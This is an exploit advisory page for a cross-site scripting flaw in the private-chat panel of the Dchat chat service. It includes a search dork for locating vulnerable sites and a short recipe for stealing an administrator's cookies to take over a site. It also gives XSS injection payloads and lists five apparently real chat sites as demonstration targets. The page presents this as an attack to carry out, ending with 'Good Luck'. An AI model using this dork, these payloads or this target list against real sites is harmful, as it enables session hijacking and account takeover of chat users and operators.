Dchat Service Cross Site Scripting

2016.03.12

Credit: Guardiran Security Team

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Dork: intext:"طراحی قالب اختصاصی توسط : دی چت"

* Exploit Title: Dchat Service Cross Site Scripting
* Discovery Date: 2016/03/10
* Dork: intext: intext:"طراحی قالب اختصاصی توسط : دی چت"
* Public Disclosure Date: 2016/03/12
* Exploit Author: Guardiran Security Team
* Contact: https: http://guardiran.org
* Vendor Homepage: http://dchat.org/
* Software Link: [-]
* Version: All Version
* Tested on: Dchat Chatrooms
* Category: webapps

Description
======================================================================


About Dchat Service:
Dchat is a chat service provider.
Dchat the best service provider with high security and Support 24-hour
Cross-site scripting vulnerability occurs in private chat panel
We can use this panel to bring the cookies of each user

Exploit:
The First We Have To Register With Commom User
Next you need a user (such as chat General Manager) select and use a private chat panel
Then, using a script placed to extract cookies do Hacking Website
Good Luck

PoC
======================================================================



XSS
~~~~~~~~~~~~~~

method="post"
Function=Panel Private Messages
Accept: aplication/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
content-Type: Application/x-www-from-urlencoded; charset=UTF-8

-- response --

HTTP/1.1 200OK
Server nginx/1.4.6 (Ubuntu)
Date: Thu, 10 mar 2016 19:18:47 GMT
Content-Type: text/html
Transfer-Encoding: Chunked
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Expires: Thu, 19 Nov 1981 08:51:00 GMT
Cache-Control: no=store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragme: no-cache
Content-encoing: gzip


Payload:
======================================================================



<script>alert('Xss')</script>    or    "><script>alert('Xss')</script>



Demo:
======================================================================



* http://www.emrischat.org/
* http://www.yashilchat.com/
* http://www.toranchat.ir/
* http://www.faytunchat.com/
* http://www.metanatchat.ir/


* Discovered By :MR.IMAN
* We Are Guardiran Security Team
* Special Tnx: C0d3!nj3ct!0n , REX , MR.IMAN , GrYpHoN , alizombie , ColEctOR ,
* MRSEZAR And All Of member's Guardiran Security Team

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Dchat Service Cross Site Scripting

Dork: intext:"طراحی قالب اختصاصی توسط : دی چت"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.